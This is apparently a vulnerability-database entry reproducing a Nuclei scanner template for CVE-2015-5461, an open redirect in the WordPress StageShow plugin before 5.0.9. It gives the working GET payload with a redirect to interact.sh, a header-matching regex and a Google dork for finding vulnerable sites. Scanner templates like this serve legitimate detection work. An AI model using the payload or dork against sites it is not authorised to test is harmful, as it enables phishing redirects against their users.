Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-5461
HistorySep 03, 2021 - 3:50 a.m.

WordPress StageShow <5.0.9 - Open Redirect

2021-09-0303:50:05
ProjectDiscovery
github.com
3

6.4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

6.4 Medium

AI Score

Confidence

High

0.005 Low

EPSS

Percentile

77.6%

WordPress StageShow plugin before 5.0.9 contains an open redirect vulnerability in the Redirect function in stageshow_redirect.php. A remote attacker can redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the url parameter.

id: CVE-2015-5461

info:
  name: WordPress StageShow <5.0.9 - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: WordPress StageShow plugin before 5.0.9 contains an open redirect vulnerability in the Redirect function in stageshow_redirect.php. A remote attacker can redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the url parameter.
  impact: |
    An attacker can trick users into visiting a malicious website, leading to potential phishing attacks.
  remediation: |
    Update to the latest version of the WordPress StageShow plugin (5.0.9 or higher) to fix the open redirect vulnerability.
  reference:
    - https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16
    - https://wordpress.org/plugins/stageshow/changelog/
    - http://seclists.org/fulldisclosure/2015/Jul/27
    - https://nvd.nist.gov/vuln/detail/CVE-2015-5461
    - https://plugins.trac.wordpress.org/changeset/1165310/
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N
    cvss-score: 6.4
    cve-id: CVE-2015-5461
    cwe-id: NVD-CWE-Other
    epss-score: 0.0055
    epss-percentile: 0.77434
    cpe: cpe:2.3:a:stageshow_project:stageshow:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: stageshow_project
    product: stageshow
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/stageshow/"
  tags: cve2015,cve,wpscan,seclists,redirect,wordpress,wp-plugin,stageshow_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 4b0a00483046022100b358a0733787a256d88b76615b87f1297c9438ed3ecb830ab1b792c58a1a954f022100b5fe98f745bc4c696d72f1499e5abb9ee02828c45f878a8d5ff4210f97726828:922c64590222798bb761d5b6d8e72950

6.4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

6.4 Medium

AI Score

Confidence

High

0.005 Low

EPSS

Percentile

77.6%